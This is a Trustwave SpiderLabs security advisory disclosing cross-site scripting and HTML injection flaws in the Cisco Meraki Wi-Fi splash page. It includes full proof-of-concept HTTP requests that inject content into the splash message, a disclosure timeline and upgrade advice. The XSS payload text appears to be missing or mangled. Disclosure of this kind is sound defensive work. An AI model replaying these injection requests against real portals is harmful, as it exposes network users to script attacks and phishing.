Trustwave SpiderLabs Security Advisory TWSL2016-001:
Multiple Vulnerabilities in Cisco Meraki
Published: 01/12/2016
Version: 1.0
Vendor: Cisco (https://meraki.cisco.com/)
Product: Cisco Meraki
Product description:
Cisco Meraki is a complete cloud managed networking solution. Cisco Meraki is
the leader in cloud controlled WiFi, routing, switching and security. Secure
and scalable, Cisco Meraki enterprise networks simply work.
Finding 1: Cross Site Scripting
Credit: Kyprianos Vasilopoulos of Trustwave
A cross-site scripting vulnerability is present in the Cisco
Meraki portal splash page. When users access a Wifi network they will be
redirected to a custom webpage before accessing the internet. By entering the
payload
on the splash page it is possible to trigger a cross site scripting
vulnerability within the visiting user's browser. In order to enter the payload
you need to login to the portal The vulnerability has been confirmed on IE 6
and 7.
Example:
Enter the payload
POST /tw_test_net-1-2/n/I9xFFbBc/splash/preview/0/efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8/ HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxx.xxx.xxx/tw_test_net-1-2/n/I9xFFbBc/manage/configure/splash_page
Cookie: p_splash_session=MMX84Ps986LNxqVsTJhsTegzOVSw_n_1FK; _session_id_for_n155=a8cf170f0016fc4a44b54f767b5cb6e7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2511
X-dotNet-Beautifier: 230; DO-NOT-REMOVE
authenticity_token=token&ssid[wired_vlan_id]=64&ssid[splash2_theme_identifier]=efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8&ssid[admin_splash_url]=&ssid_splash_detail[extra_text]=
&ssid_splash_detail[logo_md5]=&ssid_splash_detail[logo_extension]=&ssid[language_code]=en&ssid[splash_timeout]=86400&ssid[overwrite_continue_url_enabled]=false&ssid[overwrite_continue_url]=&settings_change_hash={"ssid_splash_detail[extra_text]":{"label":"Message","new_text":- XSS","old_text":"XSS"}}&ssid[number]=0&ssid[splash_type]=splash2&splash_themes[c12b0d115a00d3a88f7c39eefd60257529afaf7f][marked_for_deletion]=false&splash_themes[6961b3f08ec7dcb6eaa3fb0814e4722e4a83b6b8][marked_for_deletion]=false&splash_themes[efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8][marked_for_deletion]=false&ssid_splash_detail[color_overrides]=f7f7f7,676767,1682B9,ffffff,5e5e5e,ffffff,f7f7f7,66bc29,5f800a
User access
GET /splash/?mac=xx:xx:xx:xx:xx:xx&client_ip=xx.xx.xx.xx&client_mac=xx:xx:xx:xx:xx:xx&vap=0&vlan=64&a=cfbd5dcb7468a01c771cbf349fb3ae6424cd716e&b=3710473&auth_version=5&key=debc54xx:xx:xx:xx:xx:xx&acl_ver=P3188611V2&blocked_server=xx.xx.xx.xx&continue_url=http://google.com/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 03 Nov 2015 21:31:29 GMT; length=7122
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: n155.network-auth.com
Connection: Keep-Alive
Cookie: p_splash_session=MMvddhIIAXhRLBn3uQ6l-r2bzht8p37aIwKiWgMZL-BfKSbIu-M2n_0R6i2B8F4zsC21yFBksGnMqxBFoW2j__VmVtt27hrr7jCG2db8KIcgAGZvmg6PAeU6fl1Z0Q7obiREXMUV-mIlrUXkMF36Jr_mGD8G6fjFNZaUd8lzMHru1fdDUyXPVVH7ffP-04T7gtX_mWgAJXnn8WonMeNKzCUxsJRAQFUGVfyiaCO9r7kIt5bh7a595JIy_0p4mTb9GeUsk6S5FPmq33XGAu-kKysiPuHIQ1vLomIYllQ5WrWB_aCYcdUtvPGK8ZMWQ_ziDk65Y0S4KUeJnUzRLzwEpTRtDdRFkptyJIs9DBE5W2TsU4oljQt-z9LONLoZgqEHdTy53CYfUPSa-Ld09oWSGhGZrvw9S3H8LJ3VFVGw5iWY92eJm_qSVMCJFOu3qno0ZlgTvKwFzqSNRaUfvh5_87TiaQOGE-GStVVDtV2SXayfNjxFbmXqal-29gPLKOUlht4rDUxtV-NMj-wSkaji0AFXa86YLnkZCQgMUXrepm28Sp8Iec90u2OIHt5GyNnEu2QisYgnr2kE4
Finding 2: HTML Injection
Credit: Kyprianos Vasilopoulos of Trustwave
You can inject custom HTML code inside the splash message box. This could also
be used as part of a phishing or social engineering attack.
Example:
POST /tw_test_net-1-2/n/I9xFFbBc/splash/preview/0/efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8/ HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxx.xxx.xxx/tw_test_net-1-2/n/I9xFFbBc/manage/configure/splash_page
Cookie: p_splash_session=MMX84Ps986LNxqVsTJhsTegzOVSw_n_1FK; _session_id_for_n155=a8cf170f0016fc4a44b54f767b5cb6e7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2511
X-dotNet-Beautifier: 230; DO-NOT-REMOVE
authenticity_token=token&ssid[wired_vlan_id]=64&ssid[splash2_theme_identifier]=efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8&ssid[admin_splash_url]=&ssid_splash_detail[extra_text]=&ssid_splash_detail[logo_md5]=&ssid_splash_detail[logo_extension]=&ssid[language_code]=en&ssid[splash_timeout]=86400&ssid[overwrite_continue_url_enabled]=false&ssid[overwrite_continue_url]=&settings_change_hash={"ssid_splash_detail[extra_text]":{"label":"Message","new_text":"
Trustwave Spiderlabs
![](\"https://xxx.xxx.xxx.xxx/SpiderLabs_-_Bug.jpg\")
\n","old_text":"XSS"}}&ssid[number]=0&ssid[splash_type]=splash2&splash_themes[c12b0d115a00d3a88f7c39eefd60257529afaf7f][marked_for_deletion]=false&splash_themes[6961b3f08ec7dcb6eaa3fb0814e4722e4a83b6b8][marked_for_deletion]=false&splash_themes[efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8][marked_for_deletion]=false&ssid_splash_detail[color_overrides]=f7f7f7,676767,1682B9,ffffff,5e5e5e,ffffff,f7f7f7,66bc29,5f800a
Remediation Steps:
Upgrade to the latest device firmware.
Revision History:
10/27/2015 - Vulnerability disclosed to vendor
12/07/2015 - Patch released by vendor
12/08/2015 - Requested additional information about firmware
12/17/2015 - Sent follow-up email regarding no response
12/30/2015 - Sent follow-up email regarding no response
01/12/2016 - Sent follow-up email regarding no response
01/13/2016 - Advisory published
References
1. https://documentation.meraki.com/zGeneral_Administration/Firmware_Upgrades/Cisco_Meraki_Firmware_FAQ#How_do_I_get_the_latest_firmware_earlier.3F
About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security
risk. With cloud and managed security services, integrated technologies and a
team of security experts, ethical hackers and researchers, Trustwave enables
businesses to transform the way they manage their information security and
compliance programs. More than three million businesses are enrolled in the
Trustwave TrustKeeper cloud platform, through which Trustwave delivers
automated, efficient and cost-effective threat, vulnerability and compliance
management. Trustwave is headquartered in Chicago, with customers in 96
countries. For more information about Trustwave, visit
https://www.trustwave.com.
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
